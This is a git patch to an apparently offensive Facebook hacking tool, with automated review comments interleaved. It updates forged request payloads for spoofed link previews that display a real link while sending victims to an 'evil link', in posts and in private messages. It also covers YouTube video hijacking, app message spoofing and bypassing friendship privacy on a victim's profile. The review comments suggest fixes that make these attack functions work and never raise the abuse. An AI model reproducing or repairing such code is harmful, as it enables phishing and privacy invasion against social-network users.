From 82887bfd46914518a6a577df73a57515f078aee7 Mon Sep 17 00:00:00 2001 From: chinoogawa Date: Fri, 14 Mar 2014 01:49:18 -0300 Subject: [PATCH] Facebook has made a series of changes that compromised the functionallity of FBHT. (UN)fortunately, they didn't patch any of the vulnerbilities except "Like Flood" and Create Test Users (Massive, you can create 3 or 4 without a problem). They didn't accept the bug for the massive test's account creation, so bad! but they fixed it just in case. Crossed reference between nodes in graphs --- MyParser.py | 10 +- main.py | 82 +++++++---- mainFunc.py | 412 +++++++++++++++++++++++++--------------------------- 3 files changed, 259 insertions(+), 245 deletions(-) diff --git a/MyParser.py b/MyParser.py index d4c52f2..24b5732 100644 --- a/MyParser.py +++ b/MyParser.py @@ -24,6 +24,8 @@ def parseData(dataRaw): for data in dataRaw: + if data=="": + continue text = data.strip("for (;;);") json_dump = json.loads(text) try: @@ -33,16 +35,16 @@ def parseData(dataRaw): print 'Error in json dump or parser.feed' for i in range(len(parser.dataArray)): - if parser.dataArray[i] == 'Name:': + if parser.dataArray[i] == 'Name': names.append(parser.dataArray[i+1]) continue - if parser.dataArray[i] == 'User ID:': + if parser.dataArray[i] == 'User ID': userIds.append(parser.dataArray[i+1]) continue - if parser.dataArray[i] == 'Login email:': + if parser.dataArray[i] == 'Login email': emails.append(parser.dataArray[i+1]+'@'+parser.dataArray[i+2]) continue - if parser.dataArray[i] == 'Login password:': + if parser.dataArray[i] == 'Login password': passwords.append(parser.dataArray[i+1]) continue diff --git a/main.py b/main.py index 1e4c044..23af29e 100644 --- a/main.py +++ b/main.py @@ -9,6 +9,9 @@ globalEmail = '' globalPassword = '' +privacy = {'0':'80','1':'40','2':'10'} +privacySet = ['0','1','2'] + def main(): global globalLogin 
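Review bot: The new `if data=="": continue` guard at the top of the `for data in dataRaw` loop skips only the exact empty string, while a whitespace-only element (a stray newline, for instance) still reaches `json.loads(text)`, which sits before the `try` and therefore raises instead of landing in the `'Error in json dump or parser.feed'` handler. `if not data.strip(): continue` covers both cases and is the idiomatic truthiness test. parseData's body continues outside the hunk.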
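Review bot: `privacySet` is a hand-maintained copy of the keys of `privacy`, so the two new module-level constants can drift apart; membership in the dict itself (`option in privacy`) gives the same test with a single source of truth. If the list is kept, a comment such as `# valid keys of privacy; keep the two in sync` would at least name the coupling. The constants sit just above `def main():`, whose body is outside the hunk.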
@@ -28,7 +31,7 @@ def main(): print ' \ \ / // / | | | | ' print ' \ V // /_ | |_| | ' print ' \_/|____(_\___/ ' - + print ' _ _ ' print ' ____ | | (_) ' print ' / __ \ ___| |__ _ _ __ ___ ___ __ _ __ ___ ____ _ ' @@ -40,8 +43,7 @@ def main(): print '\n\n\n\n\n\n' raw_input('Enjoy it :D . Press enter to get started') - - + while 1: option = -1 while ((int(option) != 1) and (int(option) != 2) and @@ -66,7 +68,7 @@ def main(): print '7) Link Preview hack (Youtube version)\n' print '8) Youtube hijack\n' print '9) Private message, Link Preview hack (Simple web version)\n' - print '10) Private message, Link Preview hack (Youtube version)\n' + print '10) Private message, Link Preview hack (Youtube version)\n' print '11) Like flood\n' print '12) Publish a post as an App (App Message Spoof)\n' print '13) Bypass friendship privacy\n' @@ -151,13 +153,17 @@ def main(): password = globalPassword if (login(email,password,'real'))!= -1: - summary = raw_input('Insert a summary for the link: ') - link = raw_input('Insert de evil link: ') - realLink = raw_input('Insert de real link: ') - title = raw_input('Insert a title for the link: ') - image = raw_input('Insert the image url for the post: ') - comment = raw_input('Insert a comment for the post associated: ') - linkPreview(link,realLink,title,summary,comment,image) + option = raw_input("Insert option for privacy 0:Public 1:Friends 2:Only Me : ") + if option in privacySet: + summary = raw_input('Insert a summary for the link: ') + link = raw_input('Insert de evil link: ') + realLink = raw_input('Insert de real link: ') + title = raw_input('Insert a title for the link: ') + image = raw_input('Insert the image url for the post: ') + comment = raw_input('Insert a comment for the post associated: ') + linkPreview(link,realLink,title,summary,comment,image, privacy[option]) + else: + print "Wrong privacy value, try again " if (int(option) == 7): 
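Review bot: The privacy prompt reuses `option`, the variable that holds the menu selection, so after this block the context line `if (int(option) == 7):` runs `int()` on the privacy answer; a non-numeric entry such as `x` prints `Wrong privacy value, try again ` and then raises ValueError on that very line (the enclosing `while 1` loop is outside the hunk, so I cannot see a handler). Binding the answer to its own name keeps the menu cascade intact: `privacyOption = raw_input("Insert option for privacy 0:Public 1:Friends 2:Only Me : ")`, `if privacyOption in privacySet:` and `privacy[privacyOption]` in the `linkPreview` call. The same reuse appears in hunks `@@ -169,13 +175,17 @@` and `@@ -187,13 +197,17 @@`.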
@@ -169,13 +175,17 @@ def main(): password = globalPassword if (login(email,password,'real'))!= -1: - summary = raw_input('Insert a summary for the video: ') - link = raw_input('Insert de evil link: ') - videoLink = raw_input('Insert de youtube link: ') - title = raw_input('Insert a title for the video: ') - videoID = raw_input('Insert the video ID (w?=): ') - comment = raw_input('Insert a comment for the post associated to the video: ') - linkPreviewYoutube(link,videoLink,title,summary,comment,videoID) + option = raw_input("Insert option for privacy 0:Public 1:Friends 2:Only Me : ") + if option in privacySet: + summary = raw_input('Insert a summary for the video: ') + link = raw_input('Insert de evil link: ') + videoLink = raw_input('Insert de youtube link: ') + title = raw_input('Insert a title for the video: ') + videoID = raw_input('Insert the video ID (w?=): ') + comment = raw_input('Insert a comment for the post associated to the video: ') + linkPreviewYoutube(link,videoLink,title,summary,comment,videoID,privacy[option]) + else: + print "Wrong privacy value, try again " if (int(option) == 8): signal.signal(signal.SIGINT, signal_handler) 
@@ -187,13 +197,17 @@ def main(): password = globalPassword if (login(email,password,'real'))!= -1: - summary = raw_input('Insert a summary for the video: ') - videoLink = raw_input('Insert de youtube link: ') - title = raw_input('Insert a title for the video: ') - videoID = raw_input('Insert the video ID (watch?v=): ') - comment = raw_input('Insert a comment for the post associated to the video: ') - hijackedVideo = raw_input('Insert the ID for the hijacked video (watch?v=): ') - hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo) + option = raw_input("Insert option for privacy 0:Public 1:Friends 2:Only Me : ") + if option in privacySet: + summary = raw_input('Insert a summary for the video: ') + videoLink = raw_input('Insert de youtube link: ') + title = raw_input('Insert a title for the video: ') + videoID = raw_input('Insert the video ID (watch?v=): ') + comment = raw_input('Insert a comment for the post associated to the video: ') + hijackedVideo = raw_input('Insert the ID for the hijacked video (watch?v=): ') + hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo) + else: + print "Wrong privacy value, try again " if (int(option) == 9): signal.signal(signal.SIGINT, signal_handler) @@ -314,12 +328,20 @@ def main(): if (int(option) == 15): - analize = int(raw_input('Analyze an existing one, or a new one? (0|1): ')) - victim = raw_input('Insert the victim username or userId: ') - if (analize == 1): - analyzeGraph(victim) + + if (globalLogin == False): + email,password = setMail() else: - reAnalyzeGraph(victim) + email = globalEmail + password = globalPassword + + if (login(email,password,'real'))!= -1: + analize = int(raw_input('Analyze an existing one, or a new one? (0|1): ')) + victim = raw_input('Insert the victim username or userId: ') + if (analize == 1): + analyzeGraph(victim) + else: + reAnalyzeGraph(victim) if (int(option) == 16): fileName = raw_input('Insert the victim username: ') 
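Review bot: The `hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo)` call in the new `if option in privacySet:` branch still passes six arguments, but this same commit changes `hijackVideo` in mainFunc.py to take a seventh, `privacy`, so option 8 now fails with TypeError. The two sibling branches append `privacy[option]`; this one should too: `hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo,privacy[option])`. The branch sits inside `main()`, whose body extends beyond the hunk.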
diff --git a/mainFunc.py b/mainFunc.py index e68dcf5..e3cb6ae 100644 --- a/mainFunc.py +++ b/mainFunc.py @@ -4,7 +4,7 @@ from urllib import urlencode import simplejson as json import database -from time import time,ctime +from time import time,ctime,sleep import pickle import re from handlers import * @@ -161,7 +161,7 @@ def createUser(number): percentage = (i * 100.0) / int(number) print '\rCompleted [%.2f%%]\r'%percentage, - + sleep(60) except mechanize.HTTPError as e: logs(str(e.code) + ' on iteration ' + str(i)) print str(e.code) + ' on iteration %d'%i @@ -575,19 +575,22 @@ def appMessageSpoof(appId,link,picture,title,domain,description,comment): except: logs('Error en el modulo de appMessageSpoof()') print 'Error en el modulo de appMessageSpoof()\n' + -def linkPreviewYoutube(link,videoLink,title,summary,comment,videoID): +def linkPreviewYoutube(link,videoLink,title,summary,comment,videoID, privacy): c_user = getC_user() print str(c_user)+'\n' try: set_dtsg() arguments = { 'fb_dtsg' : br.form['fb_dtsg'], - 'xhpc_context' : 'home', + 'composer_session_id' : '38c20e73-acfc-411a-8313-47c095b01e42', + 'xhpc_context' : 'profile', 'xhpc_ismeta' : '1', - 'xhpc_timeline' : '', - 'xhpc_composerid' : 'u_jsonp_5_0', + 'xhpc_timeline' : '1', + 'xhpc_composerid' : 'u_0_29', 'xhpc_targetid' : str(c_user), + 'clp' : '{ cl_impid : 65ac6257 , clearcounter :0, elementid : u_0_2n , version : x , parent_fbid :'+str(c_user)+'}', 'xhpc_message_text' : str(comment), 'xhpc_message' : str(comment), 'aktion' : 'post', 
@@ -602,15 +605,15 @@ def linkPreviewYoutube(link,videoLink,title,summary,comment,videoID):
 'attachment[params][medium]' : '103',
 'attachment[params][url]' : str(videoLink),
 'attachment[params][video][0][type]' : 'application/x-shockwave-flash',
- 'attachment[params][video][0][src]' : 'http://www.youtube.com/v/'+str(videoID)+'?version=3&autohide=1&autoplay=1',
- 'attachment[params][video][0][width]' : '1920',
- 'attachment[params][video][0][height]' : '1080',
+ 'attachment[params][video][0][src]' : 'http://www.youtube.com/v/FxyecjOQXnI?autohide=1&version=3&autoplay=1',
+ 'attachment[params][video][0][width]' : '1280',
+ 'attachment[params][video][0][height]' : '720',
 'attachment[params][video][0][safe]' : '1',
 'attachment[type]' : '100',
 'link_metrics[source]' : 'ShareStageExternal',
 'link_metrics[domain]' : 'www.youtube.com',
 'link_metrics[base_domain]' : 'youtube.com',
- 'link_metrics[title_len]' : '54',
+ 'link_metrics[title_len]' : '92',
 'link_metrics[summary_len]' : '160',
 'link_metrics[min_dimensions][0]' : '70',
 'link_metrics[min_dimensions][1]' : '70',
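Review bot: The new `'attachment[params][video][0][src]'` value hard-codes the id `FxyecjOQXnI` where the old line interpolated `str(videoID)`, so within the visible hunks the `videoID` parameter of `linkPreviewYoutube` is no longer read; the literal looks like a leftover from a captured session rather than an intended change. Either the parameter is now dead and should be documented as ignored (with `main.py` no longer prompting for it), or the interpolation was dropped by accident. The rest of the function body is outside this hunk, so a use elsewhere cannot be ruled out from here.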
@@ -623,41 +626,73 @@ def linkPreviewYoutube(link,videoLink,title,summary,comment,videoID): 'link_metrics[images_considered]' : '1', 'link_metrics[images_cap]' : '10', 'link_metrics[images_type]' : 'images_array', - 'composer_metrics[best_image_w]' : '100', - 'composer_metrics[best_image_h]' : '100', + 'composer_metrics[best_image_w]' : '398', + 'composer_metrics[best_image_h]' : '208', 'composer_metrics[image_selected]' : '0', 'composer_metrics[images_provided]' : '1', 'composer_metrics[images_loaded]' : '1', 'composer_metrics[images_shown]' : '1', - 'composer_metrics[load_duration]' : '515', + 'composer_metrics[load_duration]' : '1058', 'composer_metrics[timed_out]' : '0', 'composer_metrics[sort_order]' : '', 'composer_metrics[selector_type]' : 'UIThumbPager_6', + 'backdated_date[year]' : '', + 'backdated_date[month]' : '', + 'backdated_date[day]' : '', + 'backdated_date[hour]' : '', + 'backdated_date[minute]' : '', 'is_explicit_place' : '', + 'composertags_place' : '', + 'composertags_place_name' : '', + 'tagger_session_id' : '1394761251', + 'action_type_id[0]' : '', + 'object_str[0]' : '', + 'object_id[0]' : '', + 'og_location_id[0]' : '', + 'hide_object_attachment' : '0', + 'og_suggestion_mechanism' : '', + 'composertags_city' : '', + 'disable_location_sharing' : 'false', + 'composer_predicted_city' : '', + 'audience[0][value]' : privacy, + 'nctr[_mod]' : 'pagelet_timeline_recent', + '__user' : str(c_user), + '__a' : '1', + '__dyn' : '7n8aqEAMBlCFUSt2u6aOGeExEW9ACxO4pbGA8AGGzCAjFDxCm', + '__req' : 'm', + 'ttstamp' : '26581658074898653', + '__rev' : '1161243', } datos = urlencode(arguments) - response = br.open('https://www.facebook.com/ajax/profile/composer.php',datos) + response = br.open('https://www.facebook.com/ajax/updatestatus.php',datos) if globalLogging: logs(response.read()) - + + except mechanize.HTTPError as e: + print e.code + + except mechanize.URLError as e: + print e.reason.args except: logs('Error en el modulo de linkPreviewYoutube()') print 
'Error en el modulo de linkPreviewYoutube()\n' -def linkPreview(link,realLink,title,summary,comment,image): +def linkPreview(link,realLink,title,summary,comment,image,privacy): c_user = getC_user() print str(c_user)+'\n' try: set_dtsg() arguments = { + 'composer_session_id' : '787d2fec-b5c1-41fe-bbda-3450a03240c6', 'fb_dtsg' : br.form['fb_dtsg'], 'xhpc_context' : 'profile', 'xhpc_ismeta' : '1', 'xhpc_timeline' : '1', - 'xhpc_composerid' : 'u_jsonp_2_c', + 'xhpc_composerid' : 'u_0_29', 'xhpc_targetid' : str(c_user), + 'clp' : '{"cl_impid":"27c5e963","clearcounter":0,"elementid":"u_0_2n","version":"x","parent_fbid":'+str(c_user)+'}', 'xhpc_message_text' : str(comment), 'xhpc_message' : str(comment), 'aktion' : 'post', @@ -675,17 +710,17 @@ def linkPreview(link,realLink,title,summary,comment,image): 'link_metrics[source]' : 'ShareStageExternal', 'link_metrics[domain]' : str(realLink), 'link_metrics[base_domain]' : str(realLink), - 'link_metrics[title_len]' : '33', - 'link_metrics[summary_len]' : '108', + 'link_metrics[title_len]' : '38', + 'link_metrics[summary_len]' : '38', 'link_metrics[min_dimensions][0]' : '70', 'link_metrics[min_dimensions][1]' : '70', - 'link_metrics[images_with_dimensions]' : '1', + 'link_metrics[images_with_dimensions]' : '3', 'link_metrics[images_pending]' : '0', 'link_metrics[images_fetched]' : '0', - 'link_metrics[image_dimensions][0]' : '200', - 'link_metrics[image_dimensions][1]' : '200', + 'link_metrics[image_dimensions][0]' : '322', + 'link_metrics[image_dimensions][1]' : '70', 'link_metrics[images_selected]' : '1', - 'link_metrics[images_considered]' : '1', + 'link_metrics[images_considered]' : '5', 'link_metrics[images_cap]' : '3', 'link_metrics[images_type]' : 'ranked', 'composer_metrics[best_image_w]' : '100', 
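Review bot: The new `except mechanize.HTTPError as e:` and `except mechanize.URLError as e:` handlers only `print`, whereas the fallback `except:` below them also calls `logs(...)`, so an HTTP or URL failure in `linkPreviewYoutube` is never passed to `logs()` while every other failure is. Mirroring the fallback keeps the record complete: `logs('Error en el modulo de linkPreviewYoutube(): HTTP ' + str(e.code))` in the first handler and `logs('Error en el modulo de linkPreviewYoutube(): ' + str(e.reason))` in the second. `str(e.reason)` is also safer than `e.reason.args`, since `URLError.reason` is not always an exception object. The same pattern is added to `linkPreview` in hunk `@@ -706,41 +741,54 @@`.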
@@ -694,7 +729,7 @@ def linkPreview(link,realLink,title,summary,comment,image):
 'composer_metrics[images_provided]' : '1',
 'composer_metrics[images_loaded]' : '1',
 'composer_metrics[images_shown]' : '1',
- 'composer_metrics[load_duration]' : '299',
+ 'composer_metrics[load_duration]' : '812',
 'composer_metrics[timed_out]' : '0',
 'composer_metrics[sort_order]' : '',
 'composer_metrics[selector_type]' : 'UIThumbPager_6',
@@ -706,41 +741,54 @@ def linkPreview(link,realLink,title,summary,comment,image): 'is_explicit_place' : '', 'composertags_place' : '', 'composertags_place_name' : '', - 'composer_session_id' : '1371889360', + 'tagger_session_id' : '1394765332', + 'action_type_id[0]' : '', + 'object_str[0]' : '', + 'object_id[0]' : '', + 'og_location_id[0]' : '', + 'hide_object_attachment' : '0', + 'og_suggestion_mechanism' : '', 'composertags_city' : '', 'disable_location_sharing' : 'false', - 'composer_predicted_city' : '106423786059675', - 'audience[0][value]' : '10', + 'composer_predicted_city' : '', + 'audience[0][value]' : privacy, 'nctr[_mod]' : 'pagelet_timeline_recent', '__user' : str(c_user), '__a' : '1', - '__dyn' : '7n8ahyj2qmpnDzk9UmAEXw', - '__req' : '9', - 'phstamp' : '16581659510745851082338' + '__dyn' : '7n8aqEAMBlCFUSt2u6aOGeExEW9ACxO4pbGA8AGGzCAjFDxCm', + '__req' : 'h', + 'ttstamp' : '26581658074898653', + '__rev' : '1161243' } datos = urlencode(arguments) - response = br.open('https://www.facebook.com/ajax/profile/composer.php',datos) + response = br.open('https://www.facebook.com/ajax/updatestatus.php',datos) if globalLogging: logs(response.read()) - + + except mechanize.HTTPError as e: + print e.code + except mechanize.URLError as e: + print e.reason.args + except: logs('Error en el modulo de linkPreview()') print 'Error en el modulo de linkPreview()\n' -def hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo): +def hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo,privacy): c_user = getC_user() print str(c_user)+'\n' try: set_dtsg() arguments = { - 'fb_dtsg' : br.form['fb_dtsg'], - 'xhpc_context' : 'home', + 'composer_session_id' : '38c20e73-acfc-411a-8313-47c095b01e42', + 'xhpc_context' : 'profile', 'xhpc_ismeta' : '1', - 'xhpc_timeline' : '', - 'xhpc_composerid' : 'u_jsonp_5_0', + 'xhpc_timeline' : '1', + 'xhpc_composerid' : 'u_0_29', 'xhpc_targetid' : str(c_user), + 'clp' : '{ cl_impid : 65ac6257 , clearcounter :0, elementid : 
u_0_2n , version : x , parent_fbid :'+str(c_user)+'}', 'xhpc_message_text' : str(comment), 'xhpc_message' : str(comment), 'aktion' : 'post', @@ -763,7 +811,7 @@ def hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo): 'link_metrics[source]' : 'ShareStageExternal', 'link_metrics[domain]' : 'www.youtube.com', 'link_metrics[base_domain]' : 'youtube.com', - 'link_metrics[title_len]' : '54', + 'link_metrics[title_len]' : '92', 'link_metrics[summary_len]' : '160', 'link_metrics[min_dimensions][0]' : '70', 'link_metrics[min_dimensions][1]' : '70', 
@@ -776,17 +824,44 @@ def hijackVideo(videoLink,title,summary,comment,videoID,hijackedVideo): 'link_metrics[images_considered]' : '1', 'link_metrics[images_cap]' : '10', 'link_metrics[images_type]' : 'images_array', - 'composer_metrics[best_image_w]' : '100', - 'composer_metrics[best_image_h]' : '100', + 'composer_metrics[best_image_w]' : '398', + 'composer_metrics[best_image_h]' : '208', 'composer_metrics[image_selected]' : '0', 'composer_metrics[images_provided]' : '1', 'composer_metrics[images_loaded]' : '1', 'composer_metrics[images_shown]' : '1', - 'composer_metrics[load_duration]' : '515', + 'composer_metrics[load_duration]' : '1058', 'composer_metrics[timed_out]' : '0', 'composer_metrics[sort_order]' : '', 'composer_metrics[selector_type]' : 'UIThumbPager_6', + 'backdated_date[year]' : '', + 'backdated_date[month]' : '', + 'backdated_date[day]' : '', + 'backdated_date[hour]' : '', + 'backdated_date[minute]' : '', 'is_explicit_place' : '', + 'composertags_place' : '', + 'composertags_place_name' : '', + 'tagger_session_id' : '1394761251', + 'action_type_id[0]' : '', + 'object_str[0]' : '', + 'object_id[0]' : '', + 'og_location_id[0]' : '', + 'hide_object_attachment' : '0', + 'og_suggestion_mechanism' : '', + 'composertags_city' : '', + 'disable_location_sharing' : 'false', + 'composer_predicted_city' : '', + 'audience[0][value]' : privacy, + 'nctr[_mod]' : 'pagelet_timeline_recent', + 'is_explicit_place' : '', + 'nctr[_mod]' : 'pagelet_timeline_recent', + '__user' : str(c_user), + '__a' : '1', + '__dyn' : '7n8aqEAMBlCFUSt2u6aOGeExEW9ACxO4pbGA8AGGzCAjFDxCm', + '__req' : 'm', + 'ttstamp' : '26581658074898653', + '__rev' : '1161243', } datos = urlencode(arguments) 
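Review bot: The `hijackVideo` argument dict gains a second `'is_explicit_place' : ''` and a second `'nctr[_mod]' : 'pagelet_timeline_recent'` (the first of each is a few lines above in the same literal), so the literal now has duplicate keys; Python silently keeps the last one, which is harmless here only because the values are identical, but it flags a copy-paste and makes this literal diverge from the one in `linkPreviewYoutube`. Drop the two repeated entries that follow `'nctr[_mod]' : 'pagelet_timeline_recent',`. hijackVideo continues past the end of the hunk.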
@@ -868,15 +943,14 @@ def privateMessageLink(message,victim,subject,realLink,title,summary,imageLink,e
 try:
 set_dtsg()
 arguments = {
- 'w' : '398',
 'message_batch[0][action_type]' : 'ma-type:user-generated-message',
 'message_batch[0][thread_id]' : '',
 'message_batch[0][author]' : 'fbid:'+c_user,
 'message_batch[0][author_email]' : '',
 'message_batch[0][coordinates]' : '',
- 'message_batch[0][timestamp]' : '1387237764222',
+ 'message_batch[0][timestamp]' : '1394766424499',
 'message_batch[0][timestamp_absolute]' : 'Today',
- 'message_batch[0][timestamp_relative]' : '8:49pm',
+ 'message_batch[0][timestamp_relative]' : '12:07am',
 'message_batch[0][timestamp_time_passed]' : '0',
 'message_batch[0][is_unread]' : 'false',
 'message_batch[0][is_cleared]' : 'false',
@@ -888,62 +962,60 @@ def privateMessageLink(message,victim,subject,realLink,title,summary,imageLink,e 'message_batch[0][has_attachment]' : 'true', 'message_batch[0][html_body]' : 'false', 'message_batch[0][specific_to_list][0]' : 'fbid:' + victim, - 'message_batch[0][force_sms]' : 'true', - 'message_batch[0][ui_push_phase]' : 'V3', 'message_batch[0][content_attachment][subject]' : subject, 'message_batch[0][content_attachment][app_id]' : '2309869772', 'message_batch[0][content_attachment][attachment][params][urlInfo][canonical]' : realLink, 'message_batch[0][content_attachment][attachment][params][urlInfo][final]' : realLink, 'message_batch[0][content_attachment][attachment][params][urlInfo][user]' : evilLink, - 'message_batch[0][content_attachment][attachment][params][favicon]' : 'http://www.whatever.com/favicon.ico', + 'message_batch[0][content_attachment][attachment][params][favicon]' : realLink+'/favicon.ico', 'message_batch[0][content_attachment][attachment][params][title]' : title, 'message_batch[0][content_attachment][attachment][params][summary]' : summary, 'message_batch[0][content_attachment][attachment][params][images][0]' : imageLink, - 'h' : '208', - 'url' : imageLink, - 'cfs' : '1', 'message_batch[0][content_attachment][attachment][params][medium]' : '106', 'message_batch[0][content_attachment][attachment][params][url]' : realLink, 'message_batch[0][content_attachment][attachment][type]' : '100', 'message_batch[0][content_attachment][link_metrics][source]' : 'ShareStageExternal', - 'message_batch[0][content_attachment][link_metrics][domain]' : 'www.mkit.com.ar', - 'message_batch[0][content_attachment][link_metrics][base_domain]' : 'mkit.com.ar', + 'message_batch[0][content_attachment][link_metrics][domain]' : realLink.strip('https://').strip('/'), + 'message_batch[0][content_attachment][link_metrics][base_domain]' : realLink.strip('https://www.').strip('/'), 'message_batch[0][content_attachment][link_metrics][title_len]' : '38', - 
'message_batch[0][content_attachment][link_metrics][summary_len]' : '180', + 'message_batch[0][content_attachment][link_metrics][summary_len]' : '38', 'message_batch[0][content_attachment][link_metrics][min_dimensions][0]' : '70', 'message_batch[0][content_attachment][link_metrics][min_dimensions][1]' : '70', 'message_batch[0][content_attachment][link_metrics][images_with_dimensions]' : '3', 'message_batch[0][content_attachment][link_metrics][images_pending]' : '0', 'message_batch[0][content_attachment][link_metrics][images_fetched]' : '0', - 'message_batch[0][content_attachment][link_metrics][image_dimensions][0]' : '856', - 'message_batch[0][content_attachment][link_metrics][image_dimensions][1]' : '566', - 'message_batch[0][content_attachment][link_metrics][images_selected]' : '3', + 'message_batch[0][content_attachment][link_metrics][image_dimensions][0]' : '322', + 'message_batch[0][content_attachment][link_metrics][image_dimensions][1]' : '70', + 'message_batch[0][content_attachment][link_metrics][images_selected]' : '1', 'message_batch[0][content_attachment][link_metrics][images_considered]' : '5', 'message_batch[0][content_attachment][link_metrics][images_cap]' : '3', 'message_batch[0][content_attachment][link_metrics][images_type]' : 'ranked', - 'message_batch[0][content_attachment][composer_metrics][best_image_w]' : '398', - 'message_batch[0][content_attachment][composer_metrics][best_image_h]' : '208', + 'message_batch[0][content_attachment][composer_metrics][best_image_w]' : '100', + 'message_batch[0][content_attachment][composer_metrics][best_image_h]' : '100', 'message_batch[0][content_attachment][composer_metrics][image_selected]' : '0', - 'message_batch[0][content_attachment][composer_metrics][images_provided]' : '3', - 'message_batch[0][content_attachment][composer_metrics][images_loaded]' : '3', - 'message_batch[0][content_attachment][composer_metrics][images_shown]' : '3', - 'message_batch[0][content_attachment][composer_metrics][load_duration]' 
: '0', + 'message_batch[0][content_attachment][composer_metrics][images_provided]' : '1', + 'message_batch[0][content_attachment][composer_metrics][images_loaded]' : '1', + 'message_batch[0][content_attachment][composer_metrics][images_shown]' : '1', + 'message_batch[0][content_attachment][composer_metrics][load_duration]' : '6', 'message_batch[0][content_attachment][composer_metrics][timed_out]' : '0', 'message_batch[0][content_attachment][composer_metrics][sort_order]' : '', 'message_batch[0][content_attachment][composer_metrics][selector_type]' : 'UIThumbPager_6', + 'message_batch[0][force_sms]' : 'true', + 'message_batch[0][ui_push_phase]' : 'V3', 'message_batch[0][status]' : '0', - 'message_batch[0][message_id]' : '<1387237764222:1517510061-619853692@mail.projektitan.com>', - 'client' : 'mercury', + 'message_batch[0][message_id]' : '<1394766424499:3126670212-4125121119@mail.projektitan.com>', + 'message_batch[0][client_thread_id]' : 'user:'+str(c_user), + 'client' : 'web_messenger', '__user' : c_user, '__a' : '1', - '__dyn' : '7n8a9EAMNpGvyVQ9UmWOGUGy6zECQqbx2mbAKGiCw', - '__req' : 'f', + '__dyn' : '7n8a9EAMBlCFYwyt2u6aOGeExEW9J6yUgByVbGAF4iGGeqheCu6po', + '__req' : '1n', 'fb_dtsg' : br.form['fb_dtsg'], - '__rev' : '1048858', - 'ttstamp' : '265816888106986872', + 'ttstamp' : '26581658074898653', + '__rev' : '1161243' } datos = urlencode(arguments) - response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php ',datos) + response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php',datos) if globalLogging: logs(response.read()) 
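Review bot: `realLink.strip('https://').strip('/')` and `realLink.strip('https://www.').strip('/')` in the two new `link_metrics` entries do not remove a prefix: `str.strip` removes any run of the listed characters from both ends, so trailing letters of the URL that happen to be in the set are eaten as well (constructed example: `'http://example.org/shop'.strip('https://')` gives `'example.org/sho'`). Parsing the URL is the reliable way to get the host, `urlparse(realLink).netloc`, with `from urlparse import urlparse` added next to the file's `from urllib import urlencode`; a leading `www.` can then be dropped with an explicit `startswith` check for the base-domain field. The same strip-as-prefix pitfall exists in the untouched `data.strip("for (;;);")` in MyParser.py. privateMessageLink continues after the hunk.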
@@ -1118,146 +1190,6 @@ def getName(userId): print e.reason.args return str(userId) -''' -def bypassFriendshipPrivacyPlot(victim, transitive,fileName): - import networkx as nx - import matplotlib.pyplot as plt - import numpy as np - - coleccion = {} - - myGraph = nx.Graph() - victima = getName(victim) - myGraph.add_node(victima) - - - #Percentage container - percentage = 0.0 - #Disclosude friends container - friendships = [] - #Already visited nodes container - visited = [] - try: - #If the file already exists - friendshipFile = open('dumps\\'+fileName,"rb") - #Reads every line of the file - while True: - linea = friendshipFile.readline() - if not linea: - break - #Store in the visited array for non repetition - visited.append(linea.strip("\n\r")) - - friendshipFile.close() - - except: - #If the file does not exists, creates the file - friendshipFile = open('dumps\\'+fileName,"wb") - friendshipFile.close() - - - try: - #Generates the first level of the search - result = coreFriendshipPrivacy(victim,transitive) - except: - print 'Check the internet connection please..' 
- return - - #Stores non repetitive values in the disclosed friends container - for individuos in result: - if individuos not in visited: - if coleccion.has_key(individuos) == False: - nodo = getName(individuos) - coleccion[individuos] = nodo - else: - nodo = coleccion[individuos] - - if coleccion.has_key(transitive) == False: - transitivo = getName(transitive) - coleccion[transitive] = transitivo - else: - transitivo = coleccion[transitive] - - myGraph.add_node(nodo) - myGraph.add_edge(nodo,transitivo) - friendships.append(individuos) - - #Counter for percentage calculus purpose - i = 0.0 - #For every value in the first disclosed list, repeats until every value has been tryed - for friends in friendships: - #Percentage calculus - percentage = (i * 100.0)/len(friendships) - print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(friendships), percentage), - i+=1 - #Only if the node wasn't visited - if friends not in visited: - #if coreFriendshipPrivacy() fails, an exception is caught. Therefore, state wis still being True. - #Only if the try passes, the infinite while will end. 
(For internet error connection problem) - state = True - while state == True: - try: - result = coreFriendshipPrivacy(victim,friends) - state = False - except signalCaught as e: - state = False - print 'Signal Caught handler' - print '%s ' %e.args[0] - return - except: - print '\rCheck the internet connection please..\r' - - #Stores non repetitive values in the disclosed friends container - for element in result: - if element not in friendships: - if coleccion.has_key(friends) == False: - nodo = getName(friends) - coleccion[friends] = nodo - else: - nodo = coleccion[friends] - - if coleccion.has_key(element) == False: - transitivo = getName(element) - coleccion[element] = transitivo - else: - transitivo = coleccion[element] - - myGraph.add_node(nodo) - myGraph.add_edge(nodo,transitivo) - friendships.append(element) - - #Stores every single value of friendships list alredy analyzed for non repetitivness - visited.append(friends) - - #Check if the file exists, if true append, else create and writes - try: - friendshipFile = open('dumps\\'+fileName,"ab") - except: - friendshipFile = open('dumps\\'+fileName,"wb") - - #Stores every userID for further analyzis - for friends in friendships: - if coleccion.has_key(friends) == False: - transitivo = getName(friends) - coleccion[friends] = transitivo - else: - transitivo = coleccion[friends] - - myGraph.add_edge(victima,transitivo) - friendshipFile.write(str(friends)+'\n') - - friendshipFile.close() - nx.draw_spring(myGraph,node_color = np.linspace(0,1,len(myGraph.nodes())),edge_color = np.linspace(0,1,len(myGraph.edges())) ,with_labels=False) - plt.savefig("graph_color.pdf") - plt.savefig("graph_color.png") - plt.show() - - nx.draw_spring(myGraph,node_color = np.linspace(0,1,len(myGraph.nodes())),edge_color = '#000000' ,with_labels=False) - plt.savefig("graph_ByW.pdf") - plt.savefig("graph_ByW.png") - plt.show() - -''' def mkdir(directory,root): import os 
